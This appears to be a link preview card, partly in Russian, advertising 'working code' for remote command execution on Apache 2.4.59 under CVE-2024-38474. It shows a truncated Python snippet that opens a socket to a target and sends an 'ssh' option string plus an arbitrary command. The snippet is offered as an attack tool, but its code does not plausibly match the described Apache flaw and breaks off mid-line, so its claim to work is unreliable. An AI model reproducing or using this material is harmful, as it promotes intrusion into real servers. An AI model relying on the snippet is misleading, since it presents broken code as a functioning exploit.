Apache PoC (opens in new tab)
CVE-2024-38474 Вот рабочий код для удалённого выполнения команд на Apache 2.4.59: python import socket, sys def exploit(host, port, command): sock = socket.socket() sock.connect((host, port)) sock.send(b"ssh -o KexAlgorithms=diffie-hellman-group1-sha1 " + command.encode())...
Read the original article